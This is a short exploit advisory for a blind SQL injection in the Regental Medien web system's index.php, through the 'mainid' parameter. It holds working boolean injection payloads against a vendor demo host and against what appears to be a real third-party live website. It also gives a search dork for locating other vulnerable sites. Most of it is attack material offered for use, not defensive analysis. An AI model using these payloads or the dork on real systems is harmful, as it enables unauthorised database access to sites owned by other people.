[o] Regental Medien Blind SQL Injection Vulnerability Software : Regental Medien Vendor : http://www.regental-medien.de/ Author : NoGe Home : http://antisecurity.org [o] Vulnerable file index.php [o] Exploit http://localhost/[path]/index.php?mainid=[SQL] [o] Proof of Concept http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE [o] Dork "powered by regental medien" [o] Note this is a private script all target are in one IP address